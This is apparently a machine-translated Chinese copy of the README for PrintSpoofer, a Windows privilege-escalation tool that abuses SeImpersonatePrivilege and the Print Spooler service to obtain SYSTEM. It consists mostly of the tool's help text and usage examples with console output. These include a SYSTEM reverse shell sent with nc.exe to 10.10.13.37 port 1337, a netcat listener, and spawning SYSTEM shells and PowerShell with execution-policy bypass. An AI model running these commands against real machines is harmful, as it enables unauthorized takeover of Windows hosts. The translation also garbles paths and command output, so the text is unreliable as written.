打印欺骗者
PrintSpoofer
在 Windows 10 和 Server 2016/2019 上滥用SeImpersonatePrivilege
从本地/网络服务到系统。
您可以使用-h
选项检查帮助消息。
C:工具>PrintSpoofer.exe -h PrintSpoofer v0.1(作者:@itm4n) 如果当前用户具有 SeImpersonate 权限,该工具将利用 Print 后台打印程序服务获取 SYSTEM 令牌,然后使用 CreateProcessAsUser() 运行自定义命令 论据: -c执行命令*CMD* -i 在当前命令提示符下与新进程交互(默认为非交互) -d 在桌面上生成与此会话 *ID* 对应的新进程(使用 qwinsta 检查您的 ID) -h 这就是我:) 示例: - 在当前控制台中以 SYSTEM 身份运行 PowerShell PrintSpoofer.exe -i -c powershell.exe - 在会话 1 的桌面上生成系统命令提示符 PrintSpoofer.exe -d 1 -c cmd.exe - 获取一个SYSTEM反向shell PrintSpoofer.exe -c“c:Tempnc.exe 10.10.13.37 1337 -e cmd”
如果您有交互式shell,则可以在当前控制台中创建新的 SYSTEM 进程。
使用案例:bind shell、reverse shell、 psexec.py
等。
C:工具>PrintSpoofer.exe -i -c cmd [+] 找到权限:SeImpersonatePrivilege [+] 命名管道监听... [+] CreateProcessAsUser() 确定 微软Windows [版本10.0.19613.1000] (c) 2020 微软公司。版权所有。 C:WINDOWSsystem32>whoami 权威体系
如果您可以执行命令但没有交互式 shell,则可以创建一个新的 SYSTEM 进程并立即退出,而不与其交互。
使用案例:WinRM、WebShell、 wmiexec.py
、 smbexec.py
等。
创建一个反向shell:
C:工具> PrintSpoofer.exe -c“C:TOOLSnc.exe 10.10.13.37 1337 -e cmd” [+] 找到权限:SeImpersonatePrivilege [+] 命名管道监听... [+] CreateProcessAsUser() 确定
Netcat 监听器:
C:工具>nc.exe -l -p 1337 微软Windows [版本10.0.19613.1000] (c) 2020 微软公司。版权所有。 C:WINDOWSsystem32>whoami 权威体系
如果您在本地或通过 RDP(包括 VDI)登录,则可以在桌面上生成系统命令提示符。首先,使用命令qwinsta
检查您的会话 ID,然后使用选项-d
指定该值。
使用案例:终端会话 (RDP)、VDI
C:工具>qwinsta 会话名称 用户名 ID 状态 类型 设备 服务 0 光盘 控制台管理员 1 活动 >rdp-tcp#3 实验室用户 3 活动 rdp-tcp 65536 听 C:工具> PrintSpoofer.exe -d 3 -c“powershell -ep绕过” [+] 找到权限:SeImpersonatePrivilege [+] 命名管道监听... [+] CreateProcessAsUser() 确定